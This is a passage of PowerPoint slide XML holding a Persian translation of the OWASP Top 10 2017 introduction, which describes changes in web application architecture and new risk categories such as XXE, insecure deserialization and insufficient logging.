                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تغییرات در سال های اخیر شتاب گرفته اند و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>به تغییر احتیاج داشت.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ما به صورت کامل </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> را از لحاظ ساختاری تغییر داده ایم و متدولوژی آن را مورد بازنگری قرار داده ایم. یک پروسه درخواست دیتا که با جامعه در ارتباط است تبیین کرده ایم،‌ خطرات را مجددا در دستور کار قرار داده ایم و هر خطر را مجددا از ابتدا نوشته ایم. و به فریمورک ها و زبان هایی که در حال حاضر به طور عمومی استفاده میشوند منابعی را اضافه کرده ایم.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>در طی سالهای اخیر، تکنولوژی و معماری اولیه ی برنامه ها به صورت چشمگیری تغییر یافته است :</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>میکروسرویسهای نوشته شده در</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>node.js </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Spring Boot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> در حال جایگزین شدن به جای برنامه های سنتی یکپارچه هستند. میکروسرویسها با چالش های امنیتی خودشان مواجه هستند که شامل برقراری اعتماد بین میکروسرویس های ، کانتینرها ، مدیریت امنیت و ... می‌شود. کد قدیمی که هرگز انتظار نمیرفت تا از طریق اینترنت قابل دسترسی باشد ،‌حالا پشت </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ها و وب سرویس </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RESTful</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> قرار گرفته تا توسط برنامه های تک صفحه ای (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SPAs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>و برنام های موبایل مورد استفاده قرار گیرد.فرض های معماری توسط کد، مثل درخواست کننده های مورد اعتماد ها دیگر معتبر نیستند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>برنامه های تک صفحه ای که در</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> API </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>جاواسکریپت نوشته شده اند، مثل </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Angular </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>، اجازه ی خلق فرانت اندهای بسیار ماژولار و پر از ویژگی را میدهند. عملکرد سمت کلاینت که به صورت سنتی در سمت سرور تحویل میشده است، چالش های امنیتی خاص خود را به همراه دارد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" marR="0" lvl="0" indent="-82550" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>جاواسکریپت حالا زبان اولیه ی وب است، با </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> node.js </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>که در سمت سرور اجرا میشود و وب فریمورک هایی نظیر </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Bootstrap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ،‌ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Electron </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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Angular </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>، و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> که در سمت کلاینت اجرا میشوند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مشکلات جدیدی که با دیتا ساپورت میشوند:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="r" rtl="1">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A4:2017-XML External Entities (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>یک دسته بندی جدید است که به صورت اولیه توسط دیتاست های</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>ابزارهای آنالیز و آزمون امنیت کد منبع</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (SAST)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ساپورت میشود.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مشکلات جدیدی که توسط جامعه ساپورت میشوند:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ما از جامعه خواستیم که نگاه دقیقی به ۲ دسته بندی از ضعف های پیش رو داشته باشند.بعد از بیش از ۵۰۰ توافق دو طرفه، وحذف مشکلاتی که توسط دیتا ساپورت میشوند (مثل افشای اطلاعات حساس یا</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XXE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> )، دو مشکل جدید عبارتند از </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="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marL="82550" lvl="0" indent="-82550" algn="r" rtl="1">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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>دیسریالیزیشن نا امن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>که اجازه ی اجرای کد به صورت ریموت یا دستکاری اشیائ حساس را در پلتفرم های تحت تاثیرش میدهد</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r" rtl="1">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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>لاگینگ و مانیتورینگ نا کارآمد</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
